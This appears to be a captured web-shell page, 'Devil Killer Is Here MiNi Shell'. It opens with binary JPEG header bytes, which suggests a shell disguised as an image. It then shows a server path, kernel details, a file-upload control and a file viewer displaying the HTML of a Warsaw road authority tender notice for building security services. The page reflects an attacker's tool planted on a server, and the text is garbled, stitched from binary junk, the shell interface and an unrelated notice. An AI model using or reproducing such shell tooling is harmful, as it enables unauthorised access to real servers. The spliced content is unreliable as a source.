JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241113/0059109501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona obiektów i mienia Zarządu Dróg Miejskich w 2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miejskich</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zarząd Dróg Miejskich Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010270068</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chmielna 120</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-801</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zzp@zdm.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zdm.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona obiektów i mienia Zarządu Dróg Miejskich w 2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bdb7adef-928f-447d-8389-5396a74fcbb7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00591095</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00033071/36/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.48 Ochrona obiektów i mienia</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.zdm.waw.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.zdm.waw.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDM/UM/DZP/95/US/5/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na: <br/>Ochronie obiektów i mienia Zarządu Dróg Miejskich w 2025 r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie czasu dojazdu Załóg Interwencyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	nie podlegają wykluczeniu, <br/>2.	spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>2.1.	kompetencji lub uprawnień do prowadzenia określonej działalności gospodarczej zawodowej tj.:<br/>2.1.1.	Wykonawca posiada aktualną koncesję wydaną przez Ministra właściwego do spraw wewnętrznych na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia zgodnie z przepisami Ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia ( Dz.U. z 2021 r. poz. 1995), obejmującą co najmniej miejsca świadczenia usług wskazane w opisie przedmiotu zamówienia.<br/>2.1.2.	Wykonawca posiada aktualną decyzję o udzieleniu pozwolenia radiowego (numer pozwolenia, data wydania, okres ważności, częstotliwości radiowe) wydaną przez Prezesa Urzędu Komunikacji Elektronicznej lub inny Organ Wystawiający potwierdzający prawo do dysponowania częstotliwością albo prawo do wykorzystywania częstotliwości.<br/>2.2.	sytuacji ekonomicznej lub finansowej tj.:<br/>2.2.1. Wykonawca uzyskał średni przychód za ostatnie 3 lata obrotowe (na podstawie „rachunków zysku i strat” pozycja „przychód netto ze sprzedaży produktów, towarów i materiałów” lub „przychód netto ze sprzedaży i zrównane z nimi”) w wysokości nie mniejszej niż: 1 200 000,00 zł (słownie: jeden milion dwieście tysięcy złotych 00/100);<br/>2.2.2. Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia, na sumę gwarancyjną co najmniej: 1 000 000,00 zł (słownie: jeden milion złotych 00/100);<br/><br/>2.3.	zdolności technicznej lub zawodowej, tj.: <br/>2.3.1.	Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków <br/>o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności był krótszy, w tym okresie – wykonał (w przypadku usług lub dostaw okresowych lub ciągłych również wykonuje) następujące zamówienia:<br/>zrealizował co najmniej 3 usługi związane z ochroną obiektów i mienia na obiektach, <br/>w których zatrudnionych było min. 400 pracowników lub o łącznej powierzchni biurowej powyżej 4.500 m2 przez okres co najmniej 12 miesięcy dla każdej usługi.<br/>2.3.2.	Wykonawca ma do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami zawodowymi odpowiednimi do stanowisk, jakie zostaną im powierzone, w szczególności określonymi ustawą z dnia <br/>22 sierpnia 1997 r. o ochronie osób i mienia ( Dz.U. z 2021 r. poz. 1995), zgodnie z poniższym wykazem:<br/><br/>Lp. Stanowisko - Wymagana liczba osób – Wymagane uprawnienia/okres posiadania wymaganych uprawnień (w latach) – Doświadczenie zawodowe (w latach) – podstawa dysponowania.<br/><br/>1.	kwalifikowany pracownik ochrony fizycznej – 12 osób – wpis na listę kwalifikowanych pracowników ochrony fizycznej/5 lat – 5 lat doświadczenia w pracy polegającej na ochronie obiektów i mienia w formie bezpośredniej ochrony fizycznej – podstawa dysponowania (umowa o pracę);<br/>2.	pracownik ochrony fizycznej – 6 osób - 5 lat doświadczenia w pracy polegającej na ochronie obiektów i mienia w formie bezpośredniej ochrony fizycznej – podstawa dysponowania (umowa o pracę);<br/>3.	kwalifikowany pracownik ochrony fizycznej (nadzór) – 2 osoby – wpis na listę kwalifikowanych pracowników ochrony fizycznej/5 lat – 5 lat doświadczenia w pracy w nadzorze pracowników ochrony fizycznej obiektów i mienia – podstawa dysponowania (umowa o pracę);<br/>4.	kwalifikowany pracownik zabezpieczenia technicznego (nadzór) – 1 osoba – wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego/5 lat – 5 lat doświadczenia w pracy <br/>w nadzorze pracowników zabezpieczenia technicznego ochrony obiektów i mienia - podstawa dysponowania (umowa o pracę);<br/>5.	kwalifikowany pracownik ochrony fizycznej (załogi interwencyjne) – 12 osób – wpis na listę kwalifikowanych pracowników ochrony fizycznej/5 lat – 5 lat doświadczenia w pracy polegającej na ochronie obiektów i mienia jako pracownik załóg interwencyjnych – podstawa dysponowania (umowa o pracę);<br/>6.	kwalifikowany pracownik zabezpieczenia technicznego w centrum monitorowania systemu monitoringu – 3 osoby – wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego/5 lat – 5 lat doświadczenia w pracy w zabezpieczeniu technicznym ochrony obiektów <br/>i mienia – podstawa dysponowania (umowa o pracę);<br/>7.	kwalifikowany pracownik zabezpieczenia technicznego – 2 osoby – wpis na listę kwalifikowanych pracowników zabezpieczenia technicznego/5 lat – 5 lat doświadczenia w pracy <br/>w zabezpieczeniu technicznym ochrony obiektów i mienia – podstawa dysponowania (umowa <br/>o pracę);<br/>8.	pracownik punktu informacyjnego – 1 osoba - wykształcenie min. średnie (preferowane wyższe) znajomość języka obcego (preferowany język angielski) w stopniu komunikatywnym umożliwiającym porozumiewanie się - nie dotyczy – podstawa dysponowania (umowa o pracę).<br/>7.2.3.3.	Wykonawca ma do dyspozycji następujące narzędzia, wyposażenia zakładu lub urządzenia techniczne:<br/>1)	centrum monitorowania systemów alarmowych i dowodzenia zmotoryzowanymi i wyposażonymi <br/>w środki przymusu bezpośredniego oraz łączności bezprzewodowej wewnętrznej i zewnętrznej grupami interwencyjnymi w celu reagowania na sygnały otrzymywane z systemu alarmowego oraz systemu monitoringu Zamawiającego - minimum 1 centrum - podstawa dysponowania;<br/>2)	zmotoryzowane i wyposażone w środki przymusu bezpośredniego oraz łączności bezprzewodowej wewnętrznej i zewnętrznej grupy interwencyjne zapewniające obsługę w trybie 24 godzinnym przez siedem dni w tygodniu w celu reagowania na sygnały otrzymywane z systemu alarmowego oraz systemu monitoringu Zamawiającego - minimum 6 patroli;<br/>3)	urządzenia systemu bezpieczeństwa typu analogicznego do „Active Guard” rejestrujące dane <br/>w pamięci wewnętrznej, z czytnikami (klawisz Odczyt - umożliwia odczyty transponderów RF-ID), wyposażone w system antynapadowy (klawisz napad) oraz natychmiastowe połączenie z Centrum Operacyjnym Wykonawcy (transmisja GSM oraz GPRS lub SMS), sygnalizującymi stan pracy urządzenia sygnałami świetlnymi - jako wyposażenie pracowników ochrony fizycznej w szczególności wykonujących obchody obiektów w siedzibach ZDM - minimum 7 sztuk;<br/>4)	elektroniczny dyspozytor kluczy (o parametrach takich jak poniżej) – 1 szt.:<br/>•	dyspozytor musi być wyposażony w czytnik zbliżeniowy obsługujący karty użytkowane przez Zamawiającego, karty (ID MIF ARE Classic 1k)<br/>•	praca autonomiczna lub w ramach systemu kontroli dostępu<br/>•	zarządzanie lokalne z poziomu panelu dotykowego<br/>•	zarządzanie zdalne z poziomu przeglądarki internetowej<br/>•	zarządzanie zdalne z poziomu oprogramowania systemu kontroli dostępu<br/>•	graficzny panel dotykowy z ekranem min. 7”<br/>•	wbudowany czytnik zbliżeniowy z obsługą szyfrowanych sektorów karty MIFARE ®<br/>•	dotykowa klawiatura<br/>•	minimum 32 klucze w depozytorze<br/>•	trwałe zespolenie klucza z brelokiem bez stosowania plomb<br/>•	możliwość stosowania plomb łączących klucz z brelokiem<br/>•	mechaniczna blokada klucza w kieszeni<br/>•	bezstykowa identyfikacja i kontrola obecności klucza za pośrednictwem identyfikatora zbliżeniowego MIFARE<br/>•	ograniczenie ilości kluczy pobranych przez użytkownika<br/>•	podział kluczy na strefę wewnętrzną i zewnętrzną<br/>•	opcja pobierania komisyjnego kluczy<br/>•	sygnalizacja przekroczenia czasu wypożyczenia klucza<br/>•	tryb pracy ze stałym lub zmiennym miejscem na klucz<br/>•	automatyczne wskazanie położenia klucza w depozytorze<br/>•	rezerwacja kluczy<br/>•	raportowanie działań użytkowników<br/>•	raportowanie obiegu kluczy<br/>•	odblokowanie awaryjne wszystkich kluczy za pośrednictwem sygnału zewnętrznego (np. <br/>z centrali ppoż.)<br/>•	odblokowanie awaryjne kluczy po komisyjnym otwarciu obudowy dyspozytora<br/>•	wykrywanie otwarcia drzwi depozytora<br/>•	wykrywanie otwarcia obudowy depozytora (anty- sabotaż)<br/>•	obudowa metalowa, szyba antywłamaniowa<br/>•	integracja programowa w obecnych systemach.<br/><br/>Wykonawca dostarczy depozytor do użytkowania Zamawiającemu na okres trwania umowy i zamontuje go we wskazanym przez Zamawiającego miejscu na obiekcie Chmielna 124. Depozytor będzie serwisowany przez Wykonawcę. Wykonawca zaprogramuje karty ID które dostarczy Zamawiający. Po upływie okresu obowiązywania umowy Wykonawca zdemontuje depozytor. Wszystkie koszty dotyczące montażu, demontażu, programowania kart i serwisu poniesie Wykonawca.<br/><br/>5)	Monitoring wizyjny dla parkingu na ul. Prądzyńskiego 15 składający się z minimum 5 kamer, rejestratora z monitorem, rozmieszczony w sposób pozwalający objąć monitoringiem cały obszar chroniony. Wyposażenie obiektu w toaletę typu „ToiToi” wyposażoną w wodę – 1 szt. <br/>6)	Wyposażenie w nadajnik GSM i zintegrowanie go z istniejącym systemem alarmowym w obiekcie przy ul. Chałbińskiego 8 i włączenie go do systemu monitoringu Wykonawcy – 1 szt..<br/>2.3.4.	Wykonawca powinien posiadać certyfikat ISO 9001:2015 (zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem spełnienia przez Wykonawcę określonych norm zarządzania jakością <br/>w zakresie świadczonych usług ochrony obiektów i mienia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie określa<br/>podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia składanych na<br/>wezwanie</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.1.w celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1.1.1.aktualną koncesję wydaną przez Ministra właściwego do spraw wewnętrznych na prowadzenie działalności w zakresie ochrony osób i mienia zgodnie z przepisami Ustawy z dnia 22 sierpnia 1997 r. <br/>o ochronie osób i mienia ( Dz.U. z 2021 r. poz. 1195), obejmującą co najmniej miejsca świadczenia usług wskazane w opisie przedmiotu zamówienia;<br/>1.1.2.	aktualną decyzję o udzieleniu pozwolenia radiowego (numer pozwolenia, data wydania, okres ważności, częstotliwości radiowe) wydaną przez Prezesa Urzędu Komunikacji Elektronicznej lub inny Organ Wystawiający potwierdzający prawo do dysponowania częstotliwością albo prawo do wykorzystywania częstotliwości;<br/>1.1.3.	sprawozdania finansowego albo jego części, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przez firmę audytorską zgodnie z przepisami o rachunkowości, również odpowiednio ze sprawozdaniem z badania sprawozdania finansowego, a w przypadku Wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego, innych dokumentów określających w szczególności przychody oraz aktywa i zobowiązania – za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy – za ten okres. <br/>Z załączonej części sprawozdania finansowego powinno wynikać, że sprawozdanie spełnia wymogi art. 52 ust. 2 ustawy z dnia 29 września 1994 r. o rachunkowości, tj. że sprawozdanie finansowe zostało podpisane - z podaniem zarazem daty podpisu – przez osobę, której powierzono prowadzenie ksiąg rachunkowych, i kierownika jednostki, a jeżeli jednostką kieruje organ wieloosobowy – przez wszystkich członków tego organu. W przypadku odmowy podpisu wymagane jest załączenie pisemnego uzasadnienia dołączonego do sprawozdania finansowego;<br/>1.1.4.	dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej <br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia (zawierających potwierdzenie zapłaty ubezpieczenia);<br/>1.1.5.	wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – <br/>w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz <br/>których usługi zostały wykonane lub są wykonywane - załącznik nr 2 do SWZ („Wykaz dotyczący doświadczenia Wykonawcy”).<br/>Do powyższego wykazu powinny być dołączone dowody określające, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa powyżej, dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>1.1.6.	wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, <br/>1.1.7.	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> aktualna koncesję wydaną przez Ministra właściwego do spraw wewnętrznych na prowadzenie działalności w zakresie ochrony osób<br/>i mienia zgodnie z przepisami Ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia ( Dz.U. z 2021 r. poz. 1195), obejmującą<br/>co najmniej miejsca świadczenia usług wskazane w opisie przedmiotu zamówienia;<br/>2. aktualna decyzja o udzieleniu pozwolenia radiowego (numer pozwolenia, data wydania, okres ważności, częstotliwości radiowe)<br/>wydaną przez Prezesa Urzędu Komunikacji Elektronicznej lub inny Organ<br/>5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>Do oferty należy dołączyć:<br/>UWAGA:<br/>Każdy dodawany w zakładce „OFERTY&#34; dokument (załącznik) musi być podpisany kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby umocowane, z zastrzeżeniami poniżej oraz z<br/>uwzględnieniem postanowień pkt 9.4. – 9.12. SWZ.<br/>W przypadku przekazywania przez Wykonawcę dokumentu elektronicznego w formacie 